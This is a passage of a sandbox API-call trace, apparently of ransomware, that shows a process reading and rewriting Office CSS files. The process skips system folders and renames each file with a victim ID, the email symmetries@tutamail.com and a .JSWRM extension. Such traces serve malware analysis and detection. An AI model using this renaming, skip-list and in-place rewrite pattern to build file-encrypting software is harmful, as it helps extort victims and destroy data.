lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0117.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME33.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme33.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.622] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=122032) returned 1 [0117.622] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dcb0) returned 0x24c1d0 [0117.622] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1dcb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1dcb0, lpOverlapped=0x0) returned 1 [0117.642] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.642] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1dcb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1dcb0, lpOverlapped=0x0) returned 1 [0117.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.643] CloseHandle (hObject=0x314) returned 1 [0117.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0117.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0117.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0117.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0117.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0117.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0117.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME33.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme33.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME33.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme33.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0117.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0117.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0117.645] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d124, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME34.CSS", cAlternateFileName="")) returned 1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2=".") returned 1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="..") returned 1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="...") returned 1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="windows") returned -1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="recovery") returned 1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="perflogs") returned 1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="documents and settings") returned 1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="system volume information") returned -1 [0117.645] lstrcmpiW (lpString1="SCHEME34.CSS", lpString2="msocache") returned 1 [0117.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0117.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME34.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME34.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME34.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0117.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0117.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME34.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME34.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME34.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0117.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0117.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0117.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0117.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME34.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme34.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.646] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=119076) returned 1 [0117.646] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d120) returned 0x24c1d0 [0117.646] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1d120, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1d120, lpOverlapped=0x0) returned 1 [0117.656] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.656] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1d120, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1d120, lpOverlapped=0x0) returned 1 [0117.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.657] CloseHandle (hObject=0x314) returned 1 [0117.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0117.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0117.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0117.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0117.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0117.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0117.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.657] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME34.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme34.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME34.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme34.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0117.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0117.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0117.658] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaccc88d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaccc88d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x202f0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME35.CSS", cAlternateFileName="")) returned 1 [0117.658] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2=".") returned 1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="..") returned 1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="...") returned 1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="windows") returned -1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="recovery") returned 1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="perflogs") returned 1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="documents and settings") returned 1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="system volume information") returned -1 [0117.659] lstrcmpiW (lpString1="SCHEME35.CSS", lpString2="msocache") returned 1 [0117.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0117.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME35.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME35.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME35.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0117.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0117.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME35.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME35.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME35.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0117.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0117.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0117.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0117.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME35.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme35.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.660] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=131824) returned 1 [0117.661] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x202f0) returned 0x24c1d0 [0117.661] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x202f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x202f0, lpOverlapped=0x0) returned 1 [0117.671] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.671] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x202f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x202f0, lpOverlapped=0x0) returned 1 [0117.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.671] CloseHandle (hObject=0x314) returned 1 [0117.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0117.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0117.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0117.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0117.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0117.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0117.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0117.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0117.672] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME35.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme35.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME35.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme35.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0117.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0117.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0117.673] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaccc88d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaccc88d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e12c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME36.CSS", cAlternateFileName="")) returned 1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2=".") returned 1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="..") returned 1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="...") returned 1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="windows") returned -1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="recovery") returned 1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="perflogs") returned 1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="documents and settings") returned 1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="system volume information") returned -1 [0117.673] lstrcmpiW (lpString1="SCHEME36.CSS", lpString2="msocache") returned 1 [0117.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0117.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME36.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME36.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME36.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0117.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0117.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME36.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME36.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME36.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0117.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0117.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0117.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0117.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME36.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme36.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.682] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=123180) returned 1 [0117.682] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e120) returned 0x24c1d0 [0117.682] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e120, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e120, lpOverlapped=0x0) returned 1 [0117.735] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.735] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e120, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e120, lpOverlapped=0x0) returned 1 [0117.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.736] CloseHandle (hObject=0x314) returned 1 [0117.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 